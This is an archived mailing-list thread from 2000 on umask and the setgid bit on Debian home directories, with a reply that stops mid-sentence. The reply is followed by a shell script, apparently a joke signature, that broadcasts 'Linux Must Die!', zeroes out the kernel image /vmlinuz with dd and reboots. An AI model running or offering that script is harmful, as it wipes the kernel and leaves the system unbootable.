[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: umask

On Fri, Jun 09, 2000 at 07:07:05AM +0000, ktb wrote:
> Andrew McRobert wrote:
> > 
> > hi all
> > 
> > When a user creates a new directory/file in their home directory,
> > the setuid bit is always set for group members, ie.
> > 
> > drwxr-sr-x
> > 
> > umask = 022, what do I need to set it to, for new files to =
> > drwxr-xr-x ...  and is this ok security-wise ... the execute bit?
> > 
> > thanks
> > 
> > Andrew
> I'm not very good with numeric file modes.  I usually use symbolic but
> I think the permissions you want would be 755.  Assuming that is
> correct you subtract that number from 777 to get the unmask number--
> 777-755=22 so the unmask value would be 022 which is what it already
> is.  Maybe I have the file mode wrong or something but maybe this will
> give you enough to figure out what you want.  I have no idea about the
> security of the permissions.  hth, kent

AFAIK, sticky bits, setuid, setguid are "inherited" from the parent
dirs.  By default, Debian sets home dirs dwrxr-sr-x, or 2755. Don't
think the umask affects that... Also, by default, when users are created
they are members of a group with the same name as the user name. All of
these things can be changed... The setgid thingy isn't a bad thing,
since files/dirs are given the same gid the user has, which presumably
isn't shared by other users (unlike a "users", or "faculty" catch all

#! /bin/sh
echo 'Linux Must Die!' | wall
dd if=/dev/zero of=/vmlinuz bs=1 \
     count=`du -Lb /vmlinuz | awk '{ /^([0-9])+/ ; print $1 }'`
shutdown -r now

Reply to: